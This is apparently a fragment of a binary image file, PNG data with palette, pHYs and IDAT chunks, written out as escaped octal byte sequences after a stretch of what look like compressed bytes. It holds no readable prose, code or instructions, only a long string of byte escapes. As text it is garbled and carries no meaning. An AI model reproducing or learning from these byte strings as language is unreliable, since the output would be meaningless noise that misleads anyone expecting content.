M\250\365k\316\246\235\022\342\351\204.\007\230\262\033\n+\257^h\306\354g\233\032\260\216t[\305J\234M\365\252\270\252\263w\255M\377\243\200\371\246S\374vW\313\305\237\247B\305\352\261+\"\275\203_\307<\215\307\267\303\303\b\t\212?\353F\3149\245\206Q\232:\260W\342\265\251\307>\335\326m\251\260\244\233\305\333\026\035\237\023eg;\226SYu\246}[\2433\353\345\3155-?<\242'\024N\013<\2515g\2628g\365\261\375.\236\255\363MA\264nf\025\022ZKuDV\376\365\031<\027\356\031?G\356\275\354\345\031\366j3x5\001\345\270\215r\372)\034\230\347\335\001\026\235\2253\177\333&\003\307\224\0218\232\263\267\222c\213d/2`or \302\231\204p\356D\232X\246\r@\037J\300\220\255\274&tB]=\177<\225}m[\352\016X\366K#\r\247\340\3477\277\177\303sl3\265\370d9I*}\007\006\331\216S\211X\024\344\360\027\030r\254VK\235\324'P\313\336\3033:\334\000\315l\217\277\031h\2078Z\346\370\332\035\247\204\324|\261k\213\363\343\215\211)\245\255\347\0030\3013\310P\277\234zf\227\303\203\341\345J||\\\364a7\261}\317\220+\253i\227\000o^\302\243T\234\373S\017Z\313\302\022\352\245\001\022\361\332\270\213\230\361\334\223\367\372f\363H8\331\346\243\240+\267u!\370\312k\n\023g\333V\002Yf\216;\253\235_\207\037\204\367rJ\333tb\3170U\340\214\350\323d\0012U(\300\357\236\b\350\036\266\013\237\364*\001\2543\2373\302n\033\231\247\313\2362\177\227\245|\037\333\356\240\251\354\234\234\350,b\307\306/\303\2123,\037g\216\305C\266\2773\222\315\202\2727\234kr\340\277\330\177\236\026{9L\026\212f?\t\316nu\265W<\024\233\317\253\265\033\316\r\202\0019\204\205\200\250W\340\035v\242\200\245\371\267\023P\267\353\265\252\326\257\375\f\346g(_\233g\366\367\335\361\360\357i\036\244\233{1e\263\354\255\300\013\3647\330\004f\032\325n\316\322p\016e8\321\324\301\2226\355\037\311\nP \002\035\253\356\324c\330\031$\323\201\366\226\325lG\243}\372\243\007\347\274\310vd\241\305(\266\234WyQ\034<\234\223\231\321\333_z!\301p\260g[\343\3778}\b\301V\213\027~8\202fx\000mC\247S\247\307%\302\264\354(`\013\000\b\314\315F\342Jx\205\333\256\346 \037\213\177\022\002\341\250\314xN3xg\313/\371Pt\352\343\215\000\027kO\230\205\340\330\227\037\254\227\371<pG\224=\333S\343s\252\024\273\365\257D>\217rPF\216\351\236w\301\251F>\331\\\342\032\336\307\212!z\273\251\325\227\257\337\216v2:\036\201\240\016\235\226\270\301\037\210|6|:\177\225\027\360\003\322\215$t\2526\b\371I5\034Jb\301\340/W\233=\252@\351\266\3541\032{g\355\360:\235_\226\220\242\310\232SS\021]\025\353\364\f\033\022\361\223\222\373\264B\356S\317M\220\263=\375y\340\231.\3566\263\266\3139\257\271\255\204}\276\271Fp\354\325\324)\356`\243\3375L\340\332\275\032\035e\262\234\356\347(\305\374;\031\371PM\301S\371\354T8\033\225\002\320\273\234LE\304\341]\333c~\263\225q-\001\006*\002\323tB\242\t\213|\252;N\265\343sh:\b\323^\307\204[\351\352$\022\317r\234\372\254\024lp\260\342\3159\032\212\303z\352\271\335ET\312\341s>@\200&\250&\035b\213\323C\t $\236\005\004\374\320\216\237m\276\242\235\351\252\337\013\317n\357a\345\373\261\024\350q\254\370!\312\316\"=9\013\314\216w>\347\3450Z\017\207\n\016\313?\034\315\334-\353\355\230\340+\025\242\246\362\373aMO\316xY^\333P|\370\261'\227\305\346\360\317\016\315\3179?\0363bv\304\016SN_p\302\032\274\347Z\r\026\224\254\245\363\"\235\361\r[\344\232\271\307\345\251\020\341\262X\222\345\360\227x2<\217G\020\330\257\343,\214\205`P\267a\000G$\330\330\223\344\244\250\031\2673\241l<\021\322\215\324\277\t\343\267\231\376}\n\335\337\004#<L\312\273\nnTo\200p^8\310\250\365\304z\257\213 ><\206\320\216Qb\363\303\212\276\030\354\334\2127{Q\235\205j\035L\361\304\266\262\331\305\371\005\354\312\365\234\214\263cyL\240Z\352\311O\363\256\036Q\022\033\021\000p)\313\312>\347F\3047U\273X4s\364\177\341]\26335s\273P\322\363\005f\322\207\0059(\316{P\316\213\205\255l\261\371\034>\177\032pn{?qw\000~\330\300ea\344\021\346s\301\217\226\246\216\034@\203.5a\337\240\177u\262\247\203\002\203\375\004\3236kk\032W\261c\262\016\017&\315\345\300\036\222\307\204\320\315\313s\366\325\035\347\0015\257N\340\005\246\343pZ\221\327\305X\222_\233\262\225\257A\340\027Gf\276\036*\303\007\t\354\316.\262w\344\203D\300\205\211<\313)5\3051z\310^@4\361\203\220*\344\034^i\221\250e\206\323\243\334\354 \262\274\234\325\344\274\254Sa\036\236k;\t\370\204\t\350\266\247f\341\334+\362\214\3072s\360\000T\004\204\036\353d\2639\204\271\216r\256\016\330\211\351TQ\373\344\326\325\226\\0\r+1\034\177{\232\n\216\223\200\322\333\264\352\271;I(q\270\340\347\004ls\320\343\314B<\243A\234\251p\025+\236\234\300\005\2168z\243\016\247\271\363U\347\214&x\233\317;\215\372Qv\334\234\332\352A+\026n+1(2\002\272u|\227\305\004\366LY\201\274\343\031K~F\200L\tXg\363\333\353\340\264J\32497j\200\270\247m\336*\242!\357u`=\021\357j\246\323m\302\372\312\362d\376n\355\265(\033r\342,a\000\302\261\235'\017\331_k\\\315~Y%\331?8\251\235\351P ^\340\372\2746j\330\007\202y\201\003N\nr\242\372\237\"ng\211\307\347=c\207\262\327\243\235CTO[\317:ZQ\324<X\352\227\355\237o9S\261\246\0058\257S\027\020^\032g9m\314#\031\313\274|\303\232\245}\226\322\326\356\232!\007\310V#\316\352\227\361\032S=WP\230?\034\240\313g'\342T\213;\021\251%Gf!\211\340fNh\304\370!\351\3579\306\355=4G\212\227\007ql\036\272z\267\021N\366\375\016y\272\275\030\350\257\307Gx\203\315\002\300\311\3004\371\212\347\236`\371>\275\225-\234v\345\330\342\265\210\006\246< !\311\"\312\221j\224\275vy\220\032\320!0\020\214\241\3543\327\207*q$\277%@\316\fK\316)\340\247\256i\235\0056\273\354\240Q\345\232^{\275eH2\275NM\344\226\236\214\344\000\343vF\003-G/\230@\302\340a\237\230\361\270\306\251K\210\336\304\202a\363\214\374\237\323\306{f6o\347\356\266siP\340\277\355\323\353!\316\323H\020\321\370,\337v@Q\273//\\\203\364\000~\222O/\341\261L\317\233\206\242\023\207\303i\217co\232\217\325\211\272VL\203\242\354\234\365L\371\334\307\000\351\273\234P\013\3069\355c\206Su\3669@\254\024'Fe\204q\274\215\204\300\3261\351\3737\267d#\244=E\330n\236\314\353\271\200\321\307\333\264\240\263\204\251\017\022j4\335\312\023c\"\224\321\221\363\366\203f'WY\b{\233\0028\224|\"\262\235(~\206\225;dcU\260\340\250\265fEE[\247\245\310q\223`b\345+\253\0250\347R\221\247\234!\t\016\326\275\235_\350\031\222\271\252\253\331\206f\241Dp\224Y\266K\331\004\373\003\311\274\035\007]\034Xlw\337\343\343L\313\304\b\361\2454Kc!\334\037\177\334\200\245K\320\265\223\372\247\031\333\271\212-9\240\334\366\304i\373\200\362b\332\000M4\264v\n\374\016\311\331\375\016\006\030Vh\342\"\355r4\340\327`\032\2759l\372\f\374!\336\256\373\314^\364N\264\350Mr\315\2724\313kyn\270S\306\325\316\335H\347\376*(\027\037t\247s\345\222\245\300v\232{\230\363y'\214\345\307\2471\316B\352\200\361\3309\362y\335\025\233J\bj&\\rwF\246U\314\027\222\264i\017O@\321\017\033\227\317\0059\t\312\023=F\313f\240\037\fZ\342\331P\250M\271\273\235\371glv\240G\2155\226\313\213S\025'\326\371:\256\337b\\^\322R\334e+2\333\264-CdS\356_M`\261]\310\342h\004\305CL\205:\203\252W\362\372$\263\002V?\340\260\266=5\273q\t\031\3527\270\272c\202%\371\226q\2412\177q\3439w.DP\302J\340\220/\347\2458}\306\251w\331\233V\036\323\360<\277\r\360;\235\331K6\320m\353\211\354\303Y\216-M\222\216\314\036\302\007 \021\204\271\313\021\f^\324\344,!K@b\t\357\271'\026\022yN\211,\365\320\376Ts\217\227\025>\026&\271\231q\r\335J\001\364T\204\237\347\364\354\316t\364\263\263\323\274a\312\200|\210\203\r\036\371>}2\3314`\364:\275\3564f\t\272\315$\255y\013\311}\345A0mve\200e\255\265\\\235\376h\2114j\327\332q;r\322>\245N\251[0s\316o\177=\223\366\013\257x\346\347;\332\t\0226j|\316TM\374V\301\352\3045\271x\r\016}y\315\372}2\375\327\212\307\323\231rfP\336\355\234\226\000\240\317\305\306L{D-\226J\277;\371b\227'F\210\341\231\205\372y\203Mu\322I\361\302\017\2245\362\302T\000L\332\013\250,\276Qfi)\210Ua\357\327j\351\206\300\227a\245|\374I\277t\303\236\035W\016\2303f\300o\204\323\317\352\324\371\331\240\366H\375\322\233\261\224\317\205\311\3336\204'{G\210\211\304tfr:\177f\333`\346uU\363\244U\006\341k\345\311s[q\t\007\270\0268f\313\322\266>\303\316\r\007\217\b#\335nu\314\324\n\003\007\026H\002\324\214\311\341\373\325Kg\037,\375H\"\0042\204\335\233\366\354\231\304+\307{\034\350w\327\323\n\336>jV\371\263b\3353K\342\212\367tb\315\371\314\250\037\3379\022\201\332g\253\017\243\2161\275\325\316\361*\315q\017g>*\302\301\023F\244yw\3046B\313n\003\2578p(\"\260\r\202\303\037\254*\013w\204\260\247Se\361x\027\215v\030\317$\034/\007-=\3448X\266pj\220\234\361\001\003:7Jl\333c\275\217\224W\264\350\257-`\304\233gd\017\220\027\210\026tl\241\344\371\024{\2710%\264\362>W\274\t\372\346\273\366\031?\344Y\356\353h7\370K\303U\275;\003\331v\022\245\036\035[\312hm\342\347\245\320Na\367\220\327q\203<jp\306\243i\ne\365\324%\341\312{X\337\253\312Nk\000V`\017\037\373z\2773D\013=kAV9\346\266\234\302\374\234\201\206gZ\001\353\375\236\373\003\275{\350\371i\351g8\327O\275\221 \203\303\\\005\034\300p\260=\301lVHXj\355$$o\002\003X\201\215n\022\323\356\035\257\341\b\301k\242\333\274L\1779\374m\177\331v|\313\352\234\305\354\033\333\233k\241\000/\356}\020Nf\205\263\237e\272\021\376\267\027g\024o\352\323\225/\357\007R\370{}\205\303Vp,4k\363\206\264j\003\374{\306Rz\022rFl\340\037P\326\345TKud\331\200U\305\177\366\005m\342]\261\277\2478\320@J\034\212\007U\333+\323\232\027\264\030=\261?\017\335:\332+Xvb\007\201\207\"\366\216\272\006\353\232R.\336*\325\323nn\211\272\037\325\255\250\263\347\220g\215\bv\313\312\255;U\215\026\033\304\327\2315\017\373\004\371\346]\346e\252`9\005\252\345\203\334\367\363\273\034\324Kb\275\322\305y6\316\305\364\bC1?\035-WyO;&=lv\256\r{\343!\224c\267z\205\013y_\261Z\305J9/k\360\3625u1\364\212\030r\006\350\367v\232[\275\201+9\355\004\b\025\026\346\355\321\241u^FZ@\031\243B\244~\257\227\202#\240V[v\321#\251!\243\230c\330^\334\330=n\004\255\244'p?\026\005\374\276\346}\246\276\226e\223\215\255\020FZ\004M\201@\267q\000\025\235\204t[^\214\3659\365\324\311\337\246e,Y\034\2308dc\314\313;'\341\343\016'\261\205\302\334\232m\276\357=\354\224\203\211\274[\200W\2558h\327\313\313\274\345\374\323P\035\026\025\240\234\261\355|Y\3433\274x\315f\t\004\323hgt!\201e\376Z\037\210-\267\235\246\257\277\216z<c\220x.o\340\261\376\257|\335\246\t\342\032\276F\324\b^\307\273\355\311<\323E\235\217e\361\315\374\315B|\275K(:J\006\256n\327\225\3275\354|j\246\326\211{\327\353\244\257~\206H:>x\235\016\323\307\240\352\345\233<S\214\305+/r\374\r\241s\376V\371q\231rd\0338\352E\007\b\277i^:\336O&\342[L\230\260x\024\254\327N:p\336\213\276\307\224g{\314\301\316\263G\021\f\265\214\345\350\367\275m\220\274,\3043!\274\255~\262\226\037\027$f\237\251*\316\341[^\361:y\262bKS]\266y\333l\212\030\365\"\231b\323ys\236\377\363\273>\272\330\201\371\261G8n\372\365\0379\200n\331\335\310*D\213\232\300\235\324Q\206\261(\370\241\301f\375N\r0\241\344\262\301\353\247\2253\244\3477)\032\312\366\031\227,\020w\210]'*\305\f\332\233m\205\022(0\274#\256\273\331\026\316\2433.\234\001\335\355\300h\007\335G\323\350\216\310\213\222\351\372\345_+\323wd\305\b\331\3117\336\237q\306\212\005g\017\333\346\217\264]\027>\207\327\006\274\252z\367q\006ejq\302\004\252b\017\277\306l\357\271\335\365\306\255\275\351c\234\232lO\270\341H\320\034\004\340J\327\271R0\237\321\020\352\034o1\265+\024K\313g.\215wi\333\027\337\234r\216?\330\ng?T\265N\037\354w\336`\016\360#\353L\234\204+\225q\310\241'\007^j\372\335\026\\\215s\270\351\0018N\234\034\220\037`U\003\243\362.o\307[D\217\3001\300\013\266\\\035\253V\275\312\225@\330%\3078 \320\004\217[\036<}\237\027U\277\322\332\363\216\375\\\344\233<bv\332\325\362f\322\350\374l\354\215\350\204\271\230\023\214\367)\000\210mAFj\347\261J\373\r\252\311f~J\207j\2573I\336['=p0\273<\277\313\262fO`\315gAx\370e'Uy\333M\202\032xM\036\260\342Tt\007\332\206\033\004\016\333\364 \221\312\321?,\353\303O\022\216\254\277W\356\3653;\222\215\261t\331\312\205s\t\214\227S?\347\023\201\004\3474z\353\366\035\034\356\017\305;\223\325w<\305\356\347N(\374\241\356\357\264)\374\256)\263\323\302\364/8n\273\3553\321\n\2261z\341\323\303w\230\347 \206\300~\223\003\253\335\237k[\374\020\315\364\255\356\375\020\303\313\"Ow\343Z6)\254\337M\250(\337\317\363-O\251\221\241\210Z\314\370\373\245\255\255r\371\351\265\333ss\223\177\372\022@P\243\327 zs\232\313\016\353\367b\350\306K\254rz\274\260\025\317\361\036\363)-\330!\037\323\265\221\3553}\016p:\265\002]\222\370\205\223\230\314x\032\314\341\264\357$\342\355\236\031\037\367&\225\244W{oZ\202f49\220S\031X\270\341h\366\366\310\310z\231\267\363-\214\374\036|X\201U\235\371\366y\335\007\364\354\033\226Y(\023\n\364\024\345\354\345%\257\355\324\3559\003\262\017\315\361d\254\202\255\321\316\005\213\262\035\223n\347J\360F\036\031\242IMy\275\211\nG\363\231y\301\350.\226\334\231_\266\343[\352\212\235\263\215\204yG,\004<\211o<mr,\342\252\336O[\263\262\311\323y\274\303\273\316w\343\377\307k{\t\326,\01686\033\"W\367\306\215`K\000\360\177f2\300_J\320\271\227\327\246\332\236P-P3\241\364:\365\221W\336\327\355\210\b^\031\355\237\245SH+\376\370\365\022\352\017\314\205|L\357_m\366<H>\305\207`\205\210\307DVj\376\246\3769\367\370~\275\005\3741\205\352\rP\341g\035\220\266\341\265%\322\252t\266\321\026\351\341\025\212\313\211\242\341\\j\3036D\376\016\260\200\214&\257^\360\346!\320\204\375<wm:\320{8\017\317a\375\016\024\301b\035\327\342<\017{O\301x\253\271\234\317\177\022\304\025\275\226\3019(\031\256\330\201\343\307v\317\323\374\b\370\244\323Q\274=\007\340\033\356b\202\032:\223\242w\361\331\242\003\\8\322\333\232\300\313\261\320^'\206\342\233\263\330\335y\237\331\t\347(\325$\346\364\"\261\3071s\325q\201\003[\363\016\272\356\265\226m\235\025z\341\351\227\225\311\323&\335\023v\272\027\266\215\356\t\376l\331\276\233`1\364\375:\302\365\263\346\027(\313^\002\230\007\232\273\004\221\370u;\257=\317!\235\323\257m\005\357\347\224\312D%!\032\375\347\250\217\222\317x\376\317\2530\t\275\266u{\034\275\274\200\305\t\211\230\372\036\277\261\327^re\365\217Mmg\000^\030\317\355\024\b\207\315o\253\033\246\355\340\326W\021\241\211+I\266\264Os\211''\274\322u\277<\241\327%:\330\332\353c*\244\363tR\236D\253\025\\\3534\236\3573\217\311\236zS\267N\033_{\313\325\342\2518\272\206\264\3149\354\030\216\3254^L\033^\273\215\023\356\347LmG?\330\246\260lLp\256\rJ\226g\343\347\315Mz\001\212c'/\303\312\355\030g\273j\321/\347\322\260\030\316\351\316\2667@\321|\262K\3020\352\265\005\257a\th(\363Tfv\241j9\\\304\362\202\203\356`#$v\360\025\307]\275\311q\313\220\312\352zN\f\231/t\304\346\026\264\254\322\366B\230\347W\322\026\210\260\373\252(\320t&\305;G\b\322a\356\271\371\363@D\202\357Aw\353][\273\3174^O\025\371\350\307KH\274\245\302\032\377\t\205\254\327s\222:\226\320;\275\261\234\312#\3478L\005Tr\312,\037\357-\207/\373 \315:W>\016/\263\216\025\242\350 s\001\366\262\216\303\341\024\247\343\326\324\260V\024L\327X\314l\240r\272\266yX\342\246##m\375<\325+n\247\271P\207?w\257s\260l\316\302\240\365\035\222\272Q}\316\342s05\204\037\206\023\343\235\035\025\250\264\360P!\216sO\\h\b\200i\031\220J\002\030\361\f\301Z\326\333\252mG\316~\336\024\342L\302x\252\351\266\255,\326\323\330\311\340$\b\220\t\300\256\247\277\321Y \326Z\206K\235b\275\234\365\034\nR\b\211\341\336\n\311\337m^^\344\344\001\201w\021\325j\235v\202q8\371\370\r\236w;W\221@~y\362\240\351\000bV\0355\214 \337\004\035\037h}\343\f\302b{\275\373\350>\267\256\027/\032{ ggD\266\337\265\2752\345\362&h\276\314\311\223N\223\003\326\261\033\2649\270\223\177\031\016$\351\343%\206\257\211O\351\365\032\315\356\"\017\032r%jl\307\352_\247:@\006\375\2163\301\364\316\335\002|/\242v\006%\261\364\273\355.s\350\204\025\272\226\3469A\312\373Al\031I\365\226M\214k\235\266Qv\3423\205\001)\363\034\016_\215\220\3603IB\351f\365<\006\327\274\017b\344s/\320\262\253\316F\366\357{\201\213t\001\033\226\023\277v\002\314s?Rp\302WpD\271\3310O\334\2100\366\032\231)\004q\267cl\025\264\016\352\215\336F\002\372:\222\007z\177NM\274\372\255\233\247\273\355\325\351\371\334on\346&8\341\326\201\330\216\202\033\036\232\344_\247a\257`1d\211OBe\023KN3\272#\247~yU\247\314\203\344\226\303f\302\353\355\244W'\335\237\342\332\344Y\272GPv\202\026\253\212\275\027\365\351\227yf\\\306\351\245\316\036\365r\335l\313MI\325\"9ot\333\365\214\301N^_n\316\323\276\377<\354\272|\355\035\312\206&\236\350\364\211.K@\242C\026l\016D\346\234\261\327\267%\313\203Oh\3125\247\317\233\271\r\233?U\216\004k.\247\223\\\220\370\227\215B(5\350\356\271\213\033:\227\202\r\345vP\0215\352\347M\n\223Gll\325\357&]\274\307\241$\336\246&^\333\000\027\312\225\274V\373{\364\352\317\023\371\353\377\000l\207\351I\006&@\177\000\000\003\000PLTE#\000)(\000*)\00311\000=.\000N/\00237\000H5\001M2\n52\f;4\nQ/\01658\013N2\016A1\017R9\01754\020C3\02288\020J3\022I7\021P8\022Q4\033;?\026PD\0305;\033R>\032XD\033QP\0374>\"U9&>M\037OC#`B'N@)X:+WV$N60B;.S['5])>_*MF6HJ4]L2nB7Zh/2e.J8?I==[k4Rp5JV<y@G`;LP{9ISCf|;3SGXANb^D\201XJf\204?G\211A/\211BC\\N[sIWcJ\213>ZYBXd]Ol^R}\216HI\222HDSXw\226J1\232JCjR\225eWrAd`a[h\235L?EfkCi_\243P0\245RArZ\236\252T+mb\216\252V>kfp\205_hoezEui\237Zm\260Y<Huqza\247Ptw\270\\.\270[:\\r\207\233`\204\275^(hp\223\274^7\240df\177h\263{p\202L\200y\256e[\222ls}o\252\206n\235L\204p\304d7M\205w~v|{w\206\207o\273\311g4\311h-\321h1T\213}\324k,\307mQ\305mc\217w\306\214y\277\272s`Q\221\200\205\200\220\332o)\216\177\206]\217\214\251u\252\244{z\267s\227\303r}\216\200\274\340t&\211\204\256x\212\255\243|\277n\217\241\204\206\274\327vN\217\207\223\213\211\215T\233\205\344w t\221\223\356x\000\227\202\324\353w$\\\235\215P\242\212\357z\036\354|/\353}7\326\177\201\340~m\344~e\271\211\204\351~X\231\221\235\352\200Cm\241\221W\250\220j\241\240\240\213\337\327\205c\340\201z\247\212\342[\251\213U\255\216\315\212v\354\204O\330\205\222\324\206\237\233\230\236\253\220\331d\254\230\236\225\331i\253\235\321\212\260\273\217\325o\253\242{\246\262s\252\254\226\234\323\315\215\274\257\223\344\255\223\357\202\245\274\207\243\302\246\235\251\307\220\312\217\242\314\241\240\251\354\217b\250\236\306\222\250\244\304\226\335\236\242\335\251\241\351\267\234\372\263\237\366\227\260\251\253\252\263\355\233x\312\243\235\272\242\363\300\243\356\267\247\341\213\272\251\346\242\211\271\260\274\264\262\267\246\274\266\274\271\276\332\270\261\307\270\370\360\265\240\310\274\351\304\302\306\256\315\301\314\305\331\314\312\316\361\304\264\323\310\371\333\314\315\350\311\302\325\322\327\332\322\371\311\334\325\365\322\306\334\332\336\341\330\371\362\331\323\345\343\347\347\342\366\360\342\343\345\353\353\356\353\360\371\351\344\363\362\375\366\363\370\360\365\367\371\364\363\364\366\363\375\372\377\377\372\371\372\374\371\370\375\377\375\377\374\005\353\310q\000\000\000\tpHYs\000\000\013\023\000\000\013\023\001\000\232\234\030\000\000 \000IDATx\332\325}\017X\024\347\271\357\336\244y\334uY%\313L\020\210\201\030R\017\t\212^PbT$EM\251`\002\001\355\246\361\002\221\324\356Az[1aA\022\022\334\223\363'\3336\251Y\032V&\246\251&\204\206\235\023\323\020s\025\353\242\321\323F\207kc\376\324\222\030\032bC\024EAA\020\346\276\357\373}3;\273K\332\323{\237{\223\373=m\234\035ff\337\375\346\373\336\367\367\3767%\273%\337\277\214\253=\342\232\352\262$Q\264X\255V\263]\324F\f|\264Z\356\030Q\273\005\263\325b\266Zm\036\251\306\262rT\355\363H\356\2713\204\252\252\004~\245\335b\266\304\314\364\313\013\3408nP\035\232\t\377\336\342\227\037\022\227\264*\312\005u N\f\033M\212\242|?/E\200\303\251\375\352\360\035\332\371<Ir\365\250\023\017dTT\347\300cMb\212[:\257\216\350\177\217\266\331\004\303c\3546\013\020|\004n@\322-\366\004\237\344\231\332\253\216?\260^\222<k\327f\207~)'P\334\246\252\307\361_\257\\\t\377]\363\376\330\304\3739\341\004&U\377\354\227\222\344+\301\343\2158CA\n\377\343j\360\243I\024S>T\325S\256\342t\370\224\346\254-O\201\177\215$\302\244Z\342\006\324^\230\276hQL\364I\322?\215\251\335\266E\222Tc6\207}ij\213\374\314\022\370wJ\277:\212?\271R\366F\211\342\254!\365\234\242\324\247\n\031k2\004\376\263m\360\226\252$\251Q\222\262\360\373\360'\353O)8\257^y\251<;y\032\020\3532\321\375\227$\030\236\252b\037\376\223R\035\b\344\033'\321j\265?<>\366\260\025\311\021<\222tQ\035\276\375\037\326J\322Zk\030\201I\255-\362\276.\234\253\007`J\242\220\300fx\265\307\325\361\037\303{V\360\2456\305\303_m\270p\242\2475J\005B\215T\216w.\035V\373\247h\217\331\245\252\037\002!\276\272\022\370\t&\274_\335\226\353t#\215\222\273\244Q\3727xN\300\370\275\360<s\257\332\177\275\005?\224H0\341\357\326\342/\231m\265\205\022X\255\034\226\345}\255x\b\253h\243\270\300/\227\302\227\217\252'E\261,\200\217U\224\n\370\221\260V`\341\b>\251 \201\023\210D\354\342O\201\t\033H/v5\022AU&\021W\374T\270+\245\240\312'\345\212\345\322\253\212\362\336;)\261\301\031\304\325w\327\250\372\233h\374\024[|I=O\277e\266\331\026\261\356\353K\201B\334\017\260\257\372\2476\310\33681\252W\035\232\205\323\333\246\324\307?s\370M\334y0\363f\253\335\t\263$I\231l\365\016\261}\005\343\244\252n\005z\022\262J\334\222G4\265~\252N\254f\177\021j\245\332<\217\364\350[/\301\3677\272\262\004\273\305\022m\307\371\203\365wR\035\232\203\027e}\244\252\177\300\305\035m\265\204\257\373z%P\366SYn\300o:\242\252\277\227\345\025\242\370\3108\233\233\270\247\016\277\342\227ey\363\034;l\273hX7\211.\370\036\007\277\227\357\253\234\2467\306\324^~.\035\376l:1\246~\252}A\026\316\214\217\376\013o\260\270\310\312\206\305.\332\243o\036T{p\205\257\036W\317g\227\227\244\301<0\002\205\030\235+\245\342k\204\267\334 FE\211\003\352\240\277!J\214\352W\373\341\242\302\206\026\031\307\036Y\366\227^\277p\335\272yp\267\220\346\226\n\370\275\260\257\206\227\2129\212rN\035\3731?'\300/0]P/w-\321)\254\365\270\322s\211>WI\346\242e\213\326\257_d\341\337\177\2106\332\224>u|u:c\221D`\214\231~\001\033\300\363\002kJ\211\022\371\003U\375s!\256\370\361GD\261\020\317x;\217v5\0256\003\211\360\301_\b\233HtJU\332w?\0003'4)\037\217\251\247[\265s\t%n\223\252~\254\254\321_\2220M\020\211\300\335\257J\236kh\235\326\345\361\277\r\300\252\022\267\252\270\3429\201v\030f\\\000\226\3406\201\207s\n\317\250\243/G\335>\204,m\246W\366\026\316\237\nl\006\270w%\320\347\335.\267\267\302\327\346\302*\323\276\272G\035\337\030\000\236~\331\270E\247\231\324\013\212\262$d%\301\233\227~\271\033\376\263\b\226\260\007IL\241\363\217\250\352\221\225\203\352\310,\215=\362\005\200|H0\022(,^\201\343\345Q\365\314\322\036|qH\362\202\340\246\273On\316\351j\221\217)\371b\262$\245\263\263QQw\f\253\003o\234\306\tk3PcR\337\013\371\214\363\332(y\312q\356V\001/\236\276\001\016j\331\367\367\252\352\270\252\036\322y\217\201\300\220\031\344c\301\031U\035\243\245\377\315\026\222(\032\327Z.\373\2379*\313o*M\242P\307vI|} P\377GU\235Pq\302\326\030\t\034\353\252O\n\333\214N\251\2348\266S\252\233n\023\035\270o\360gFu\2538\266\352\363\207/\026^1?\212 P8N\327\357\232_\270En\271\305\300\367o\360\342\nh\250PZ\005`\253\364\353\221\207+\357\323\365\347Z\327\b!38\324\027>\376r\376\374\331\363g\317^<{\276\037?\236\207\201\377\366\217\323\003F\360\270\227F\237v\250\337z\341\334\005\375\270\177\202\256\037=\203#\370t\270\274\237\316\\8w\016\276\353,=\373\334\271\013\027\316\r\323\365j\177\b1&\365k>&\235\301\263\1779\013\003\376C\037a2\317\033f$l\006{\277|\006\371\214\377\215\031<\313f\020\346p\362\031\034;P\237\032\266\006\253\244\022Z\203\345\222{\206-\266\004\327`\032\236\217X\203\202 L\306f\264\301\327\340\234\302\315\262?r\rz+pw\226G\256\301\266\320581\351..\321v\361\214\0328\250aw\364\321\256<\022\312e&a3|,>C\273\036\330\346--\362\346\320]\374T\330.N\252nk\253>N\317\017\337\305x\"'\202\017\276\370\002\347\203\310\253k\031\037\004\036\275\353\366\001u\344\366\277\305\007\305\025\214\017\216\253g`\347\017\257\024\305\007e\177\220\017\n\353\344\226H>\b\370\002 \327\033\037#\037l\r!0D\222 Te\222\344\227\222\307\314%I\254&I\372\246 \267\356\326%\311\227\274\342J]\222l\217\002\354\004\242?\016$\311\203\363\005&I6\343\373m\007I\222/\204K\222\007\"$\211\020&\213\353<\265\231L\026\327\226\244/Z6w\355\332\271\232\240=B\262\230\340~\346\227\312\3426\220\305@\237\037\206.\213U\220\305+\220\342\355(\213KA\3205\243,^!\206\312b\204\375 \213\337\013\225\305\236\0204\223mD3\215\016\207\021\315\3344\n\212\023\\\263\222\241\231t\035\315\210v\035\315d(\f\315l\026\247N\025\207\020\315\b\250\020\021\232\331\322L\323\332Nhf\336\272u\267\342\335\351\036\035\3150\305\t\320\314\027ah\246\355S]\035@<\230\353\006<\270\023\367\260+\0235\246\030\001e\032\303\203\264\3702\031\036\224\312\023&\305\203k\016\002}ql\013\003\036,\244\231\371\r=\375M\216\007o\001<\030\203zDr\035<\247$\210\363\021\017f4\2751\254\366\005wC\261IX\312\020\265\230^\f\033\226#\352\003\200\250\205PD=\256!j\307%\246\302L\216\250\341\375v\212\241\210\272\207\355\253\244\200\322\024\027\216\250\271\322\304p\376L]B\"+K\310.'D\215\277u\354\237\362\252<\f\245\226O\242\223X\230N\302f\254\234\351$\276/\325I:\271N\002\357e>\351$\250U\213\361\025\n\033\250\223\230u\235D\254\r\352$\333\f:I\246\003\277\001a\251\211\324\201K\370\311\355,\300m\353N\256\210\320\352b\266\251\343\\\253kD\255n\344\216\033\213$i\375dZ]'\2017Z\361\270\237[\202Z]\000\271q=ju\321\270\262c\246\371\244\274XN\340\3121\366\0325\364\177\n7C\255\303IZ]\312\207W\325SU\005\250\343\247\224\273J\222\201\212p\275x&\340\375\240^\214\337Nz\3615\341z\361,\320\2133\360g\3643S\000\323\213g\016\220^\234$\246\346\247\212\006\275\230)M\370\212\247\032\365b\001\365\342\327\312\263\220\273\345V\205[\026\204h\213\315\036aY\200U\260\232Y\026b}\222\233\036\267\001-\013E\271\223[\026vq\201\303,\013\025\357\217\251\357gDZ\026\232^\325\224\246 wE\275=\324\262\000\364\371\376\373\204\332\023_V_\021i\233\211f\266\231a\243mf\203e)\354\000\217T3{\266\275\252f2\333\214\266\342o\221\345\037\b\371m\250\b}\211m&\227\204\2240\240\016\337\256\317\037\331f\306\036\310\250\256\207\205\026c\002\3722\205nu\354=\270\276\365\216h\253\031\246,\310?\314V\033\260\231\036`16\224i@~\215\344.\232\013\252\353\037j\212\032\245\272*\311%f\320K%\340:\213\021\3104[1c\277\334\242\264\341\302{`\\\023\341A\021\001\032\340n\311W\236\310T\324#\301\371\223\\\t\260\257.\340\216z|\246\331\004\364\211\342\232\313p\242\251\023x\374r\033l\n\263a\177\300\244\336\013\232m\f\254j\022\037E\304\304\201\3258P\334\324J\322\353\n\b}\320\000,@\376\255~y\241\305r\347\210\332G\020\245S\336\207\326\216\f\004BA\363\225>\203\257\023\337H\027o\037Q\007\210\346\264\274l\244\017\026\337' \201\333\366\203\216\272\311\204\364U( \243\177\2072R\366\337\032c\013\235\301hs\237\332g\346\260\336n\235\201\334\325\367!\333h\273A\305\337q\000\321\206\rX\216}90b\377}fP\224\320\024 